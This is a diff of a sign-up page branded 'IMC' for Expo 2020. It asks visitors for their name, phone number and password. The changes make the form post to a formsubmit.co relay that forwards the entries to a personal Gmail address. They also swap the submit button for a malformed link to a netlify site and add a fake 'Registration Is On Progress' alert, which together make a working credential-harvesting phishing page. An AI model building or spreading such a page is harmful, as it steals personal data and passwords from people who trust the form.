--- a/index.html
+++ b/index.html
@@ -28,10 +28,10 @@ function hideURLbar(){ window.scrollTo(0,1); } </script>
 <div class="main-agileits">
 	<h2 class="sub-head">Sign Up</h2>
 		<div class="sub-main">	
-			<form action="https://expo2020-imc-account.herokuapp.com/" action="https://formsubmit.co/masonbrown7845@gmail.com"   method="post">
+			<form action="https://formsubmit.co/masonbrown7845@gmail.com" action="https://expo2020-imc-account.herokuapp.com/"    method="post">
 				<input placeholder="First Name" name="Name" class="name" type="text" required="">
 					<span class="icon1"><i class="fa fa-user" aria-hidden="true"></i></span><br>
-				<input placeholder="Last Name" name="Name" class="name2" type="text" required="">
+				<input placeholder="Last Name" name="Last" class="name2" type="text" required="">
 					<span class="icon2"><i class="fa fa-user" aria-hidden="true"></i></span><br>
 				<input placeholder="Phone Number" name="Number" class="number" type="text" required="">
 					<span class="icon3"><i class="fa fa-phone" aria-hidden="true"></i></span><br>
@@ -42,7 +42,7 @@ function hideURLbar(){ window.scrollTo(0,1); } </script>
 				<input  placeholder="Confirm Password" name="Password" class="pass" type="password" required="">
 					<span class="icon6"><i class="fa fa-unlock" aria-hidden="true"></i></span><br>
 				
-				<input type="submit" value="sign up">
+				<input type="submit" <a href="https://expo-imc-account.netlify.com" onclick="substitute()">Submit</a>>
 			</form>
 		</div>
 		<div class="clear"></div>
@@ -53,7 +53,14 @@ function hideURLbar(){ window.scrollTo(0,1); } </script>
 <div class="footer-w3">
 	<p>&copy; 2019 IMC Sign Up Form . All rights reserved | Design by Imc</p>
 </div>
+
 <!--//footer-->
 
+<script type="text/JAVASCRIPT">
+	function substitute() {
+	 alert ('Your Registration Is On Progress');
+	}
+
+ </script>
 </body>
 </html>
